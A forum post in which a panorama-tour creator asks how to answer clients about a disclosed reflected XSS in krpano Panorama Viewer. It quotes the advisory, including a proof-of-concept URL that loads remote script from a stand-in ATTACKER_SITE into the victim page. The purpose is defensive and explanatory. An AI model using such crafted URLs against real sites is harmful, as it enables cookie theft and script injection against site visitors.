Hi there,
I'm dealing with several large corporate clients who are rather obsessive about security and penetration testing. They are apprehensive about creating tours because of potential threats and vulnerabilities which could be created by adding a tour to their server and website.
I came across this https://seclists.org/fulldisclosure/2020/Oct/7 which details an exploit titled: XSS in krpano Panorama Viewer
Can anyone provide any more information about this and how I might deal with this if it comes up when dealing with Krpano security issues? I need to have an educated response if I am asked about it so I would really appreciate some info.
Thank you,
Details below:
*XSS in **krpano Panorama Viewer *
CVSS Severity: *Medium*
CVSS Score: *6.1*
CVSS Vector:
CVSS:3.0/AV:N/AC:L/PRCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N:N/UI:R/S:C/C:L/I:L/A:N
<https://www.first.org/cvss/calculato…S:C/C:L/I:L/A:N>
*Description*
krpano Panorama Viewer <=1.20.8 is vulnerable to a Reflected Cross-Site
Scripting (XSS) vulnerability caused by improper validation of user
supplied input when loading remote js and XML files in the default
installation (krpano.html).
*Impact*
A remote attacker could exploit this vulnerability using a specially
crafted URL to execute a script in a victim's Web browser within the
security context of the hosting Web site, once the URL is clicked or
visited. An attacker could use this vulnerability to steal the victim's
cookie-based authentication credentials, force malware execution, user
redirection and others.
*Steps to Reproduce*
Exploit example, from documentation tutorials:
http://VICTIM_SITE/krpano.html?html5=only&preview.type=grid()&plugin[test].url=[align=center&plugin[test].onclick=dosomething]https://ATTACKER_SITE/labs/krpano/krpano.js&plugin[test].align=center&plugin[test].onclick=dosomething[/align](hello,plugin)&onstart=showlog();
*Fix*
Block remote load of js and XML files. Contact the vendor.